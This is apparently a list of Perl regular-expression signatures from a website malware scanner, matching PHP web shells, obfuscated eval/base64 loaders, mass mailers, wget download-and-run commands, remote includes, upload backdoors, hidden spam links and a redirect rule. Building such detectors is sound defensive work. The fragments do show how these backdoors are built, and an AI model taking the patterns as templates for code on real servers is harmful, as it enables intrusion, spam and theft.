qr/<html>\s+<head>\s+<title><\?php\s+tr\(\'name\'\,false\)\;\s+\?>\s+<\?php\s+echo\s+VERSION\;\?><\/title>.+?function\s+pingoutservers\(\)\s+\{.+?function\s+StopSendMail\(\)\s+\{.+?<\/body>\s+<\/html>/is,
qr/<\!DOCTYPE.+?<title>\(c\)\s+private\s+mail\-worker\s+\(c\)<\/title>.+?function\s+randmail\(\).+?\$numemails\s+\=\s+count\(\$allemails\)\;.+?<\/style>\s+<\/body>\s+<\/html>/is,
qr/<\?php\s+Error\_Reporting\(E\_ALL.+?<title>FakeSender\s+by\s+POCT\s+\[FuckAV\.ru\]<\/title>.+?if\(mail\(\$to\,\s+\$subject\,\s+\$message\,\s+\$header\)\).+?\?>\s+<\/body>\s+<\/html>/is,
qr/<\?\s+eval\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\;\s+\?>/is,
qr/<\?php.+?\?>([A-z0-9]{1,20})\%([A-z0-9]{1,20})\%.+?\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/<\?php\s+if\(\@isset\(\$\_SERVER\[HTTP\_.+?\]\)\)\{\@eval\(base64\_decode\(\$\_SERVER\[.+?\]\)\)\;\}exit\;\?>.+?sites\/libasset\.php/is,
qr/<\?php.+?c99\s+injektor.+?<\?php\s+chdir\(\$lastdir\)\;\s+c99shexit\(\)\;\s+\?>/is,
qr/<\?php.+?\$language\=\'ru\'\;.+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$script\s+\=\s+basename\(\_\_FILE\_\_\)\;.+?function\s+getUniqueCode\(\)\{.+?\$pageURL\.\"osh3\.php\"\;.+?o3\:\$o3<br>\"\;\s+\?>/is,
qr/<\?php\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\?>/is,
qr/<\?\s+\$times\=rand\(.+?\$code\=\s+<<<EOD.+?\$encoded\=base64\_encode\(\$code\)\;.+?closedir\(\$dh\)\;\s+\}\s+\}\s+\}\s+\?>/is,
qr/<\?.+?if\(isset\(\$\_SERVER\[\'WINDIR\'\]\)\)\{.+?if\(strstr\(\$contents\,\"c99\"\)\)\{\s+return\s+true\;\s+\}\s+\}\s+\?>/is,
qr/<\?php\s+\@system\(\"cd\s+\/tmp\;wget\s+http\:\/\/.+?\@shell\_exec\(\"cd\s+\/tmp\;wget\s+http\:\/\/.+?\?>/is,
qr/<\?php.+?array\(\"\.\"\,\"\.\.\"\,\"\.\.\/\.\.\"\,\s+\"\.\.\/\.\.\/\.\.\"\)\;.+?array\(\"index\.html\"\,\s+\"index\.htm\"\,\s+\"index\.shtml\"\,\s+\"default\.asp\"\)\;.+?\]\)\.\"\?domain\=\"\.base64\_encode\(\$\_SERVER\[\'HTTP\_HOST\'\]\)\)\;.+?\"\)\;\s+\?>/is,
qr/<\?php.+?\@shell\_exec\(\"cd\s+\/tmp\;\s+wget\s+http\:\/\/.+?\?>/is,
qr/<\?\s+error\_reporting\(.+?\)\.\"\.\"\.base64\_encode\(\$.+?if\s+\(\(include\(base64\_decode\(.+?\)\.\"\/\?\"\.\$str\)\;\}\s+\?>/is,
qr/GIF89a.+?<\?php\s+eval\(gzinflate\(str\_rot13\(base64\_decode\(.+?\)\)\)\)\;\s+\?>/is,
qr/GIF89a.+?<\?php.+?webadmin\.php.+?function\s+error\s+\(\$phrase\)\s+\{.+?\}\s+\?>/is,
qr/GIF89a.+?<\?php\s+if\s+\(isset\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\s+eval\(stripslashes\(\$\_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\)\;\s+\?>/is,
qr/<\?php\s+print\s+\'\!hacked\!\'\;\s+\?>/is,
qr/<\?php\s+system\(\'wget\s+http\:\/\/.+?\)\;\?>/is,
qr/<\?php\s+error\_reporting.+?upload\s+shell.+?move\_uploaded\_file\(\$saw1\,\$saw2\)\;\s+\}\s+\?>/is,
qr/GIF89a.+?<\?\s+eval\(stripslashes\(\$\_POST\[\w\]\)\)\;exit\;\?>\;/is,
qr/<\?php\s+error\_reporting\(.+?\$cookiename\=.+?\'\.getenv\(\"HTTP\_HOST\"\)\.\'\s+\~\s+Shell\s+I.+?exit\(\)\;\s+\?>/is,
qr/<\?\s+\$buffer\s+\=.+?\$buffer\.\=.+?\$newphrase\=str\_replace\(.+?eval\(\$\_\w\(\$newphrase\)\)\;\s+\?>/is,
qr/<\?pHp\s+\$([A-z0-9]{1,20})\s+\=\s+urldecode\(\$\_GET\[\'\w\'\]\)\;\s+\@ini\_set\(\'output\_buffering\'\,0\)\;\s+\@ini\_set\(\'display\_errors\'\,\s+0\)\;\s+\$auth\_pass\s+\=\s+\"([A-z0-9]{32})\"\;\s+\$([A-z0-9]{1,20})\s+\=\s+file\_get\_contents\(\$([A-z0-9]{1,20})\)\;\s+eval\(\$([A-z0-9]{1,20})\)\;\s+\?>/is,
qr/<\?php.+?function\s+ASGLogin\(\)\s+\{.+?if\s+\(empty\(\$tmpdir\)\).+?<\/html><\?php\s+chdir\(\$lastdir\)\;\s+\?>/is,
qr/<\?php.+?str\_replace\(\"j\"\,\"\"\,\"sjtrj\_jrjejpljajcje\"\)\;.+?\(\"i\"\,\s+\"\"\,\s+\"ibiaisie6i4i\_dieicoide\"\)\;.+?\(\"k\"\,\"\"\,\"crkekatkek\_kfkukncktkikon\"\)\;.+?\(\)\;\s+\?>/is,
qr/GIF89a1\s+<\?php\s+\@error\_reporting\(NULL\).+?\$nowaddress\=.+?\$nowaddress.+?Upload.+?<\/form>\"\;\s+\?>/is,
qr/<\?php\s+echo\(base64\_decode\(.+?\)\)\;\s+\?>/is,
qr/<\?\/\*\s+eval\(base64\_decode\(+?\)\)\;\s+\*\/\s+\?>/is,
qr/<\?php.+?\$cache\_folder\s+\=\s+\"wtuds\"\;\s+\$template\_folder\s+\=\s+\"sotpie\"\;.+?\$user\_agent\_to\_filter\s+\=\s+array\(.+?exit\;\s+\}\s+\?>/is,
qr/<\?php\s+ignore\_user\_abort\(\)\;.+?if\s+\(strpos\(\$inn\,\s+\"\.php\.suspected\"\)\).+?rename.+?\?>/is,
qr/<\?php\s+extract\(\$\_COOKIE\)\;\s+if\s+\(\$\w\)\s+\{\s+\@\$\w\(\$\w\,\$\w\)\;\s+\@\$\w\(\$\w\(\$\w\,\$\w\)\)\;\s+\}/is,
qr/<\?php\s+eval\s+\(\$\_POST\[\'([A-z0-9]{1,20})\'\]\)\;\s+\?>/is,
qr/<\?php\s+header\(.+?\$Remote\_server.+?function\s+GetHtml\(\$url\)\s+\{\s+return\s+getHTTPPage\(\$url\)\;\s+\}/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"\"\;\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\.\'([A-z0-9]{1,20})\'\..+?\$([A-z0-9]{1,20})\=([A-z0-9]{1,20})\(\)\;.+?\$([A-z0-9]{1,20})\=array\(.+?\$([A-z0-9]{1,20})\=([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\,\s+join\(\'\'\,\s+\$([A-z0-9]{1,20})\)\s+\)\;.+?return\s+\"\{\$([A-z0-9]{1,20})\}\{\$([A-z0-9]{1,20})\}\"\;\s+\}\s+\?>/is,
qr/<\?php.+?\$subject\s+\=\s+\"php\s+SSH\"\;.+?if\s+\(\$hist\_arr\)\s+\{.+?<\/BODY>\s+<\/HTML>/is,
qr/<\?php\s+echo\s+\'\'\;\s+\$([A-z0-9]{1,20})\s+\=\s+\"\\x61\"\s+\.\s+\"s\"\s+\.\s+\"\\x73\"\s+\.\s+\"e\"\s+\.\s+\"r\"\s+\.\s+\"\\x74\"\s+\.\s+\"\"\;\s+\@\s+\$([A-z0-9]{1,20})\s+\(\s+\"e\"\s+\.\s+\"v\"\s+\.\s+\"a\"\s+\.\s+\"l\"\s+\.\s+\"\(\"\s+\.\s+\"g\"\s+\.\s+\"z\"\s+\.\s+\"u\"\s+\.\s+\"n\"\s+\.\s+\"c\"\s+\.\s+\"\\x6f\"\s+\.\s+\"m\"\s+\.\s+\"\\x70\"\s+\.\s+\"\\x72\"\s+\.\s+\"E\"\s+\.\s+\"\\x73\"\s+\.\s+\"S\"\s+\.\s+\"\(\"\s+\.\s+\"b\"\s+\.\s+\"a\"\s+\.\s+\"s\"\s+\.\s+\"\\x65\"\s+\.\s+\"6\"\s+\.\s+\"4\"\s+\.\s+\"\\x5f\"\s+\.\s+\"d\"\s+\.\s+\"\\x.+?\)\)\)\;\"\s+\)\s+\;\s+\?>/is,
qr/<\?php\s+\@ini\_set\(\'display\_errors\'\,.+?function\s+wp\_cd\(\$.+?\$npDcheckClassBgp.+?\}\s+\?>/is,
qr/<\?php\s+\$login\=\"\"\;\s+\$md5\_pass\=\"\".+?eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\/\*.+?\*\/\s+\@error\_reporting\(0\)\;\s+\@eval\(base64\_decode\(\".+?\)\)\;\s+\/\*.+?\*\/\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\s+\=\s+\'.+?\$([A-z0-9]{1,20})\(\"\"\)\;\s+\$([A-z0-9]{1,20})\=\(\d\d\d\-\d\d\d\)\;\s+\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\-1\;\s+\?>/is,
qr/\?\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'\#\#\#\#\#\#\#\#\#\#\#e\#\#va\#\#\#\#\#\#\#\#l\#\(\#\#b\#\#\#\#\#a\#\#\#\#\#\#\#\#\#\#\#s\#\#\#\#\#e\#\#6\#\#\#\#4\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\_\#\#d\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#\#e\#\#c\#o\#\#de\#\#\#\#\#\#\#\(\#\#\\\'.+?\$([A-z0-9]{1,20})\=str\_replace\(\'\#\'\,\s+\'\'\,\s+\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\=create\_function\(\'\'\,\$([A-z0-9]{1,20})\)\;\$([A-z0-9]{1,20})\(\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\"([A-z0-9]{20,}).+?eval\(base64\_decode\(\$([A-z0-9]{1,20})\)\)\;\s+\?>/is,
qr/<\?php.+?GLOBAL\s+\$wehaveitagain\;.+?\/\/\}\}([A-z0-9]{5,})\s+\?>/is,
qr/<html>.+?print\s+\"<h1>\#p\@\$c\@\#<\/h1>\\n\"\;.+?touch\/\*\;\*\/\(\$filename\,\s+\$time\)\;.+?<\/html>/is,
qr/<script\s+type\=\"text\/javascript\">var\s+a\=\"\'([A-z0-9]{1,20})\'.+?clen\;clen.+?clen.+?String\.fromCharCode\(a\.charCodeAt\(.+?unescape.+?document\.write\(\w\)\;<\/script>/is,
qr/<\?php\s+\/\*versio\:\d\.\d\d\*\/\s+\$GLOBALS\[\"([A-z0-9]{1,20})\".+?\)\;\s+return\s+\$\w\(substr\(\$\w\,\s+\$\w\,\s+\$\w\)\)\;\}\;eval\(([A-z0-9]{1,20})\(([A-z0-9]{1,20})\,([A-z0-9]{1,20})\)\)\;\}\;\?>/is,
qr/<\?php\s+\$.+?\'gzun.+?ress\'\;\$.+?\'ba.+?64.+?array\(.+?eval\(.+?\?>/is,
qr/\/\/istart.+?\/\/iend/is,
qr/<\?php\s+if\(\!class\_exists\(.+?\$this\->show\_xmlsitemap\(\)\;.+?wp\_sysoptions.+?\$jos\_opti\=new.+?\}\s+\?>/is,
qr/<\?php\s+ob\_start\(\)\;\s+var\_dump\(\$\_POST\,\s+\$\_GET\,\s+\$\_COOKIE\,\s+\$\_FILES\)\;\s+\$output\s+\=\s+ob\_get\_clean\(\)\;\s+\$fp\s+\=\s+fopen\(\'\.\/error\_log\'\,\s+\'a\'\)\;\s+fwrite\(\$fp\,\s+print\_r\(\$output\,\s+TRUE\)\)\;\s+fclose\(\$fp\)\;\s+ob\_end\_clean\(\)\;\s+eval\(gzinflate\(base64\_decode\(.+?\)\)\)\;\s+\?>/is,
qr/<\?php\s+\$array\s+=\s+array\(.+?\).+?eval\(\$gzc\(\$b64\(\$r13\(\$.+?\?>/is,
qr/<\?php\s+\$.+?\"pre\"\.\"g\_\"\.\"rep\"\.\"lace\"\;\s+\$.+?\(strrev\(\"e\/\*\.\/\"\)\,\s+strrev\(\"\(edoced\_46esab\(etalfnizg\(lave\"\)\.\".+?\)\;\s+\?>/is,
qr/<\?php\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\s+\=\s+\"\\x.+?\$([A-z0-9]{1,20})\s+\=\s+Array\(\s+\$GLOBALS\[\'([A-z0-9]{1,20})\'\].+?eval\(\$([A-z0-9]{1,20})\[\$GLOBALS\[\'([A-z0-9]{1,20})\'\]\[\d\d\]\]\)\;\s+\}\s+\}/is,
qr/<\?php.+?class\s+browseDir\s+\{.+?function\s+upload\(\$ifupload\)\{.+?if\(\!empty\(\$eval\)\s+\&\&\s+\$eval\s+\!\=\s+\'\'\)\{.+?<\/body><\/html>\s+\<\?\}\?>/is,
qr/<span\s+style\=\"position\:absolute\;visibility\:\s+collapse\;\">.+?(viagra|cialis|levira|kamagra).+?<\/a>\s+<\/span>/is,
qr/<\?php.+?c40shell\.php\s+v\.Undetected.+?<\?php\s+chdir\(\$lastdir\)\;\s+c40shexit\(\)\;\s+\?>/is,
qr/<\?PHP\s+\#\s+Web\s+Shell\s+by\s+oRb.+?\\x3B\"\)\;\s+\?>/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'.+?([A-z0-9]{1,20})\|.+?\;\$([A-z0-9]{1,20})\=\_\_FILE\_\_\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\{\d\}\.\$([A-z0-9]{1,20})\{\d\d\}\.\$.+?eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(.+?([A-z0-9]{1,20})\=\=\'\;/is,
qr/<\?php\s+\$([A-z0-9]{1,20})\=\'([A-z0-9]{1,20})\'\;\$([A-z0-9]{1,20})\=\"([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20})\=\_\_FILE\_\_\;\$([A-z0-9]{1,20})\=\$([A-z0-9]{1,20})\{\d.+?eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\'([A-z0-9]{1,20}).+?\)\)\)\;return\;.+?([A-z0-9]{1,20})\=\=\'\;/is,
qr/<\?php\s+\$login\_successful\s+\=\s+false\;.+?function\s+selfURL\(\)\s+\{.+?if\(eregi\(\"Linux\"\,\$OSV\)\).+?\$proxy\_shit\=.+?\$([A-z0-9]{1,20})\s+\=\s+urlencode\(\$\w\)\;\s+\?>/is,
qr/<script>\s+var\s+\_0x([A-z0-9]{1,10})\=\[.+?\(\)\;\"\,\"\\x([A-z0-9]{2})\"\,\"\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\\x([A-z0-9]{2})\"\,\"\\x([A-z0-9]{2}).+?\]\;eval\(function\(\_0x.+?\]\)\,0\,\{\}\)\)\s+<\/script>/is,
qr/<\?php\s+\/\/3Turr\~C0nfig\s+public\s+edition.+?\@symlink\(\'\/\'\,\s+\'Turr\/root\'\)\;.+?<\/html>\'\;\s+\}\s+\?>/is,
qr/<font\s+id=\"([A-z0-9]{1,20})\"\s+color=\"\#00FFFF\"\s+style=\"width:\s+0;\s+height:\s+0;overflow:\s+hidden;\s+font-family:courier;\s+position:\s+absolute;\s+font-size:\d\dpx\"><a\s+href=http:\/\/.+?(viagra|pharmacy|cialis|levitra).+?<\/a><\/font>/is,
qr/<\?php.+?--==\[\[BSKH Auto Symlink\]\]==--.+?gzinflate\(base64\_decode\(\$.+?\}eval\(.+?\)\);\s+\?>/is,
qr/<\?php\s+\@error_reporting\(0\);\s+\@set_time_limit\(0\);\s+\$code = \".+?\";\s+\@\s+\?>/is,
qr/;tixe.+?;\)0\(emitnur_setouq_cigam_tes\@.+?\" = ssap_htua\$/is,
qr/<span style=\"font-size:5px; font-style:italic; font-family:Arial; width:\d\dpx; display:none; color:violet;\">\s+<a href=http:\/\/.+?(viagra|cialis|levitra).+?<\/a>\s+<\/span>/is,
qr/<?php if \(isset\(\$_GET\[\"CONFIG\"\]\)\) if \(.+?md5\(\$_GET\[\"CONFIG\"\]\)\)\{.+?if\(is_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\]\)\)\{move_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\);return null;\} \?>/is,
qr/<\?php extract\(\$_REQUEST\) \&\& \@assert\(stripslashes\(\$([A-z0-9]{1,20})\)\) \&\& exit;/is,
qr/<\?php.+?if\(\!function_exists\(\"scandir\"\)\) \{.+?\$currentCMD = str_replace\(.+?Command completed.+?exit;\s+\?>/is,
qr/<\?php if \(\$_FILES\[\'([A-z0-9]{1,20})\'\]\) \{move_uploaded_file\(\$_FILES\[\'([A-z0-9]{1,20})\'\]\[\'tmp_name\'\], \$_POST\[\'Name\'\]\); echo \'OK\'; \} else \{ echo \'You are forbidden\!\'; \} \?>/is,
qr/<\?php if\( isset\( \$_REQUEST\[\"\w\"\] \) \) \{ system\( \$_REQUEST\[\"\w\"\] \. \" 2>\&1\" \); \}/is,
qr/<\?php.+?Hacked by Ammar The-InJx.+?return \$info;\s+\}\s+\?>/is,
qr/<\?php\s+if\(\!class_exists\(\'.+?\{\$is_bot=1;\}\$bad_file=array\(\"png.+?AND\@preg_match\(\'\/bing\|msn.+?urldecode\(.+?\\x\w\w\"\]\(\);\?>/is,
qr/<\?php \$([A-z0-9]{1,20})=\"([A-z0-9]{20,}).+?\$([A-z0-9]{1,20}) = str_replace\(\"b\",\"\",\"bsbtbrb_rbebpblacbe\"\); \$([A-z0-9]{1,20})=\"([A-z0-9]{20,}).+?\$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"q\", \"\", \"qbaqsqeq6q4q_qdqecoqde\"\); \$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"z\",\"\",\"crzezatez_fzunctzizon\"\); \$([A-z0-9]{1,20}) = \$([A-z0-9]{1,20})\(\"\", \$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\"([A-z0-9]{1,20})\", \"\", \$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\.\$([A-z0-9]{1,20})\)\)\); \$([A-z0-9]{1,20})\(\); \?>/is,
qr/<\?php\s+\/\*([A-z0-9]{1,20})\*\/\s+if\(md5\(\$\_POST\[\"([A-z0-9]{1,20})\"\]\)\s+\=\=\=\s+\"([A-z0-9]{32})\"\)\s+\{\s+eval\(base64_decode\(\$\_POST\[\"([A-z0-9_]{1,20})\"\]\)\)\;\s+\}\s+\/\*([A-z0-9]{1,20})\*\/\s+\?>/is,
qr/<\?php\s+\/\*\w,\w,\w,\w,\w.+?\w,\w,\w,\w,\w\*\/\s+\?>/is,
qr/<\?php.+?if \(stristr\(php_sapi_name\(\).+?404\);\} exit\(\); \?>/is,
qr/<\?php\s+if \(!isset\(\$sRetry\)\).+?\$stCurlLink = base64_decode\(.+?curl_close\(\$stCurlHandle\)\;.+?\?>/is,
qr/eval\(\"\?\>\" \. base64_decode\(.+?\)\); \?>/is,
qr/<\?php.+?\$alphabet =.+?exit\(\);.+?\$([A-z0-9]{1,20}) =.+?\"\"\.chr\(.+?\)\.\"\"\.chr\(.+?\)\.\"\\x.+?\]\.\$([A-z0-9]{1,20})\[\d\d\], \$([A-z0-9]{1,20}) ,\"([A-z0-9]{1,20})\"\);/is,
qr/<\? echo\(base64_decode\(.+?\)\); \?>/is,
qr/<\?php.+?\$auth_pass.+?FilesMan.+?preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3B\",\"\.\"\);\?>/is,
qr/<\?php\s+\@preg_replace\(\"\\x.+?\);\?>/is,
qr/<\?php \$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}).+?\);\$([A-z0-9]{1,20}) = \"([A-z0-9]{20,})\";\$([A-z0-9]{1,20}) = true;\$([A-z0-9]{1,20}).+?\$([A-z0-9]{1,20}) = \"\"; \?>/is,
qr/<\?php if \(\$_SERVER\[\'QUERY_STRING\'\] != \"passw0rd\"\) \{.+?\$uploadfile = \$uploaddir \. basename\(\$_FILES\[.+?\$numemails mail\(s\) was sent successfully\'\); <\/script>\";.+?\?>\s+<\/body>\s+<\/html>/is,
qr/\@ini_set\(\'display_errors\', \'0\'\);.+?if \(!\$npDcheckClassBgp\) \{.+?str_replace\(\'([A-z0-9_]{1,20})\', \'bas\'.+?str_replace\(\'([A-z0-9]{1,20})\', \'64\'.+?function wp\_cd\(\$fd, \$fa=\"\"\).+?fwrite\(\$hdl, \"<\?php\\n\$mtchs\[1\]\\n\?>\"\);.+?\$npDcheckClassBgp = \'([A-z0-9]{1,20})\';\s+\}/is,
qr/<html>.+?<body>\s+<script type=\"text\/javascript\">.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+setTimeout\(([A-z0-9]{1,20})\(\),([0-9]{1,5})\);\s+\}\s+function ([A-z0-9]{1,20})\(\)\s+\{\s+([A-z0-9]{1,20}) = ([A-z0-9]{1,20})\(\);\s+([A-z0-9]{1,20}) = \[([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}).+?\}\s+<\/script>\s+<\/body>\s+<\/html>/is,
qr/<html>.+?<body>\s+<script type=\"text\/javascript\">.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+setTimeout\(([A-z0-9]{1,20})\(\),([0-9]{1,5})\);\s+\}.+?function ([A-z0-9]{1,20})\(\)\s+\{\s+([A-z0-9]{1,20}) = ([A-z0-9]{1,20})\(\);\s+([A-z0-9]{1,20}) = \[([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}),([0-9]{1,5}).+?\}\s+<\/script>\s+<\/body>\s+<\/html>/is,
qr/<\?php \/\* get_header\(\); .+?\$wordpress_report = strrev \(.+?\@move_uploaded_file\(\$open_image_tmp,\$image_tmp\);.+?\?>/is,
qr/<\?\s+\/\/ \@\~ PRO Mailer V2.+?return stripslashes\(ltrim\(rtrim\(\$string\)\)\);.+?function SendOrMail\(\$from\) \{.+?sent successfully\'\); <\/script>\";\}\}\s+\?>/is,
qr/preg_replace\(\"\/\.\+\/e\",\"\\x65.+?\\x3B\",\"\.\"\);/is,
qr/if \(isset\(\$_GET\[\'CONFIG\'\]\)\) if \(.+?if\(is_uploaded_file\/\*;\*\/\(\$_FILES\[.+?\$file = \$_FILES\/\*;\*\/\[.+?touch\/\*;\*\/\(\$filename, \$time\);\s+return null;\s+\}/is,
qr/<\?php\s+\$\w = array\(.+?\);\s+\$([A-z0-9]{1,20}) = implode\(\"\", \$\w\);\s+\$([A-z0-9]{1,20}) = \"base64_decode\";\s+\$([A-z0-9]{1,20}) = \"gzuncompress\";\s+\$([A-z0-9]{1,20}) = \"str_rot13\";\s+eval\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\(\$([A-z0-9]{1,20})\)\)\)\);\s+\?>/is,
qr/<\?php echo base64_decode\(\'([A-z0-9]{1,20})\'\); if\( isset\( \$_REQUEST\[\'\w\'\] \) \) \{ system\( \$_REQUEST\[\'\w\'\] \. \' 2>\&1\' \); \}/is,
qr/<\?php\s+\/\/header\(.+?=urldecode\(.+?<spango>.+?\$\{\"\\x47\\x4c\\x4f\\x42\\x41\\x4c\\x53\"\}.+?\]\(\);\?>/is,
qr/<\?php\s+if \(\$_REQUEST\[\'action\'\] ==.+?base64_decode\(\$_REQUEST\[.+?if \(mail\(stripslashes\(base64_decode\(\$.+?\} else \{echo \'not found\';\}/is,
qr/<\?php.+?\$filter = base64_decode\( \$kses_str \);.+?echo \$wp_auth_check;/is,
qr/<\?php.+?\$wp_file_descriptions = array\(.+?\$search\.\"\.\@\"\.\$wp_file_descriptions\[\'rtl\.css\'\]\);\s+\?>/is,
qr/<\?php \@eval\(\"\?>\"\.base64_decode\(.+?\)\);\/\/Generated by Ampare PHP Encoder. For more security please use php protect before encode the php program/is,
qr/<\?php echo \'<div style=\"position:absolute; left:-9000px;\"><a href=\"http:\/\/.+?\">(viagra|cialis|levitra)<\/a><\/div>\'; \?>/is,
qr/if\(\$([A-z0-9]{1,20})=curl_init\(\)\)\{if\(isset\(\$_GET\[base64_decode.+?curl_close\(\$([A-z0-9]{1,20})\);\}\}/is,
qr/RewriteEngine on\s+RewriteCond \%\{HTTP_USER_AGENT\} android \[NC,OR\].+?RewriteCond \%\{HTTP_USER_AGENT\} !\(windows\\\.nt\|bsd\|x11\|unix\|macos\|macintosh\|playstation\|.+?RewriteRule \^\(\.\*\)\$ http:\/\/.+?\.ru \[L,R=302\]/is,
qr/<\? function ([A-z0-9_]{1,20})\(\$\w\)\{\$\w=Array\(\'.+?\);return base64_decode\(\$\w\[\$\w\]\);\} \?><\?php \$GLOBALS\[\'([A-z0-9_]{1,20})\'\]\[\d\].+?\)\); \?>/is,
qr/error 407<\?php system\(\$_GET\[cmd\]\); \?>/is,
qr/<\?php eval\(chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(.+?\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\.chr\(([0-9]{1,3})\)\); \?>/is,
qr/preg_replace\(\"\\x2f.+?\\x3d\"\);/is,
qr/<\?php\s+\@ini_set\(.+?function wp_cd\(\$fd, \$fa=\"\"\).+?\$npDcheckClassBgp = \"([A-z0-9]{1,20})\";\s+\}\s+\?>/is,
qr/<\?php \/\* WARNING:.+?;eval\(base64_decode\(.+?\)\);return;\?>/is,
qr/<\?php\s+\@eval\(base64_decode\(.+?\)\);\s+\?>/is,
qr/([A-z0-9]{1,20}) <\?php\s+if\(\@md5\(\$_POST\[\"gif\"\]\) === \"([A-z0-9]{20,})\"\) \{\s+eval \(base64_decode\(\$_POST\[\"php\"\]\)\);\s+exit;\s+\}\s+\?>/is,
qr/<\?eval\(stripslashes\(array_pop\(\$_POST\)\)\)\?>/is,
qr/<\?php.+?function writerss\(\$name,\$text\) \{ echo \"<\"\.base64_encode\(\$name\)\.\">\"\.base64_encode\(\$text\)\.\"<\/\"\.base64_encode\(\$name\)\.\">\\n\"; \}.+?<\/output><\/channel><\/rss>\";\s+\?>/is,
qr/<\?php echo base64_decode\(.+?\@include\(\"http\:\/\/.+?\); \?>/is,
qr/<\?\s+require\(\"\.\.\/includes\/configure\.php\"\);.+?echo \"WORK\";.+?mysql_close\(\$link\);\s+unlink\(\"([A-z0-9]{1,20})\.php\"\);\s+\?>/is,
qr/<\?php include\(\"http:\/\/.+?\"\); \?>/is,
qr/<\?php\s+if\(isset\(\$_POST\[\'code\'\]\)\) \{\s+if \(\$_POST\[\'code\'\]\!=\"\"\) \{\s+eval\(stripslashes\(\$_POST\[code\]\)\);\s+exit;\s+\}\s+\}\s+echo \"([A-z0-9]{1,20})\";\s+\?>/is,
qr/<\?php \@passthru\(\"cd \/tmp;wget http:\/\/.+?\); \?>/is,
qr/<\?php \$x\w\w=\"\\x65.+?\);if\(isset\(\$_POST\[.+?\}else\{\@\$x\w\w\(\$_POST\[.+?\]\);\}\?>/is,
qr/<\?.+?preg_replace\(\"\/\.\*\/e\",\"\\x65.+?\\x3b\",\"\.\"\);/is,
qr/<\?php preg_replace\(\"\/\.\*\/e\",\"eval\(gzinflate\(base64_decode\(.+?\)\)\);\",\"\"\); \?>/is,
qr/<\?php if \(isset\(\$_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\) eval\(stripslashes\(\$_REQUEST\[\'([A-z0-9]{1,20})\'\]\)\); \?>/is,
qr/<\?php \$firewall = true; \$stew = error_reporting\(\).+?if \(\$firewall\)\{header\(\"horrible:1\"\);\} echo \"attack_queue\";\} \}/is,
qr/<\?php.+?\|\| InboX Mass Mailer \|\|.+?<script>alert\(\'Mail sending complete.+?<\/html>/is,
qr/<\?php\s+\/\/Starting.+?if \(\$surl_autofill_include and \!\$_REQUEST\[\"c99sh_surl\"\]\).+?c99shexit\(\); \?>/is,
qr/<\?php\s+\/\*\s+b374k.+?\$b374k=\@\$.+?\);\?>/is,
qr/<\?php\s+\$auth_pass.+?\$noname.+?eval\(str_rot13\(gzinflate\(str_rot13\(base64_decode\(\$noname\)\)\)\)\);/is,
qr/if\(isset\(\$_REQUEST\[\'sort\'\]\)\)\{\s+\$string = \$_REQUEST\[\'sort\'\];\s+\$array_name = \'\';\s+\$alphabet =.+?strrev\(\"noi\"\.\"tcnuf\"\.\"_eta\"\.\"erc\"\);.+?\$\w\(\);\s+exit\(\);\s+\}/is,
qr/<\?php \$([A-z0-9_]{1,20}) = true;\$([A-z0-9_]{1,20}) = true;\$([A-z0-9_]{1,20}) = false.+?\$([A-z0-9_]{1,20}) = \"([A-z0-9_]{1,20})\";\$([A-z0-9_]{1,20}) = \"\";\$([A-z0-9_]{1,20}) = ([0-9]{1,20}); \?>/is,
